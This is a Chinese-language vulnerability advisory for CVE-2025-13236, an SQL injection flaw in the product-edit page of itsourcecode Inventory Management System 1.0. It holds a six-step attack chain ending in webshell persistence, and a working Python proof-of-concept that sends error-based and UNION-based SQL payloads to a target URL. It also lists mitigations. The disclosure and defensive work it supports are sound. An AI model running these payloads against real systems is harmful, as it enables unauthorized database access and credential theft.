CVE-2025-13236 itsourcecode Inventory Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13236

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Inventory Management System 1.0

漏洞概述

CVE-2025-13236是itsourcecode Inventory Management System 1.0中存在的一个中等严重性SQL注入漏洞。该漏洞位于管理后台的产品编辑功能中，具体涉及/admin/products/index.php?view=edit页面。攻击者可以通过操纵ID参数注入恶意SQL代码，实现对数据库的未授权访问和操作。由于该漏洞可远程利用且无需高权限认证，因此对系统安全构成较大威胁。漏洞利用代码已在公开渠道出现，攻击者无需高级技术背景即可实施攻击。此漏洞可能导致敏感数据泄露、数据库被篡改，甚至可能进一步导致服务器被完全控制。建议受影响用户尽快采取防护措施。

技术细节

该SQL注入漏洞存在于itsourcecode Inventory Management System 1.0的/admin/products/index.php文件中的edit功能模块。漏洞的根本原因在于应用程序未对用户提交的ID参数进行充分的输入验证和SQL语句参数化处理。攻击者可以通过构造恶意的SQL payloads，如使用UNION SELECT、布尔盲注或时间盲注等技术，从数据库中提取敏感信息。漏洞利用路径为：通过HTTP GET请求访问/admin/products/index.php?view=edit&id=[malicious_payload]，其中ID参数未经过滤直接拼接到SQL查询语句中。攻击者可以利用该漏洞获取数据库版本信息、用户凭据、数据库表结构等敏感数据，甚至可以通过OUTFILE或INTO OUTFILE等语句向服务器写入恶意文件，进而实现远程代码执行。CVSS 3.1评分6.3（中等）反映了该漏洞对机密性、完整性和可用性均造成较低至中等程度的影响。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的itsourcecode Inventory Management System 1.0，定位到/admin/products/index.php管理后台入口

STEP 2

步骤2

漏洞探测：攻击者访问/admin/products/index.php?view=edit&id=1测试基本功能，分析响应判断是否存在SQL注入漏洞

STEP 3

步骤3

Payload构造：攻击者根据目标数据库类型构造恶意的SQL注入Payload，如使用UNION SELECT、布尔盲注或时间盲注技术

STEP 4

步骤4

数据提取：利用注入漏洞逐步提取数据库敏感信息，包括数据库名、表结构、用户凭据等数据

STEP 5

步骤5

权限提升：获取管理后台凭据后登录后台，进一步利用其他漏洞（如文件上传）实现远程代码执行

STEP 6

步骤6

持久化控制：通过写入Webshell或创建后门账户，实现对服务器的持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13236 SQL Injection PoC
# Target: itsourcecode Inventory Management System 1.0
# Vulnerability: SQL Injection in /admin/products/index.php?view=edit

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability by injecting malicious payload into ID parameter
    """
    # Construct the vulnerable URL
    exploit_url = f"{target_url}/admin/products/index.php?view=edit&id={payload}"
    
    try:
        response = requests.get(exploit_url, timeout=10)
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

def test_basic_sqli(target_url):
    """
    Test basic SQL injection with error-based extraction
    """
    # SQL injection payload to extract database version
    payload = "1' AND (SELECT 7747 FROM(SELECT COUNT(*),CONCAT(0x71716b7171,(SELECT MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -"
    
    print(f"[*] Testing SQL injection on: {target_url}")
    print(f"[*] Payload: {payload}")
    
    status, response = exploit_sqli(target_url, payload)
    
    if status:
        print(f"[+] Status Code: {status}")
        if "error" in response.lower() or "sql" in response.lower():
            print("[+] Potential SQL injection detected!")
            return True
    return False

def extract_db_info(target_url):
    """
    Extract database information using UNION-based injection
    """
    # UNION-based SQL injection payload
    payload = "1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71716b7171,database(),0x716b706b71)-- -"
    
    print(f"[*] Extracting database information...")
    status, response = exploit_sqli(target_url, payload)
    
    if status and response:
        print(f"[+] Database info extracted successfully")
        return response
    return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_13236.py <target_url>")
        print("Example: python cve_2025_13236.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Test for vulnerability
    if test_basic_sqli(target):
        print("[!] Target is vulnerable to CVE-2025-13236")
        extract_db_info(target)
    else:
        print("[-] Target may not be vulnerable or is not accessible")

影响范围

itsourcecode Inventory Management System 1.0

防御指南

临时缓解措施

在厂商发布修复版本之前，可采取以下临时缓解措施：1）使用Web应用防火墙规则阻断针对/admin/products/路径的可疑SQL注入请求；2）限制管理后台的访问IP，仅允许可信IP段访问；3）启用数据库查询日志监控，及时发现异常SQL执行行为；4）临时关闭产品编辑功能或实施人工审核机制；5）部署入侵检测系统（IDS）监控针对该漏洞的扫描和利用行为。建议尽快升级到厂商发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13236
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13236
3 Details https://www.cvedetails.com/cve/CVE-2025-13236/
4 VulDB https://vuldb.com/cve/CVE-2025-13236
5 Link https://github.com/3169417664/cve/issues/3
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332562
8 Link https://vuldb.com/?id.332562
9 Link https://vuldb.com/?submit.686702